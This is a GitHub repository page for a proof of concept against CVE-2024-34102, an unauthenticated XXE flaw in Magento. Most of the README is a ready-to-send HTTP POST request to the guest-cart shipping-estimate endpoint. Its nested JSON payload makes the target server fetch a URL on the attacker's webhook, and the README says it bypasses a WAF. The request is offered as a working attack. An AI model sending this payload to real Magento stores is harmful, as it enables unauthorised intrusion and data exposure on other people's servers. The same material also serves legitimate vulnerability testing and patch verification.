Skip to content
/ CVE-2024-34102 Public

POC for CVE-2024-34102 : Unauthenticated Magento XXE and bypassing WAF , You will get http connection on ur webhook

2 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

11whoami99/CVE-2024-34102

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 
xxe.xml
xxe.xml
 
 

Repository files navigation

CVE-2024-34102

POC for CVE-2024-34102 : Unauthenticated Magento XXE and bypassing WAF , You will get http connection on ur webhook

POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Host: example.com
Accept:  application/json, text/javascript, */*; q=0.01
Content-Length: 310
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

{
  "address": {
    "totalsCollector": {
      "collectorList": {
        "totalCollector": {
          "sourceData": {
            "data": "http://YOUR-webhook",
            "dataIsURL": true,
            "options": 1337
          }
        }
      }
    }
  }
}

About

POC for CVE-2024-34102 : Unauthenticated Magento XXE and bypassing WAF , You will get http connection on ur webhook

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published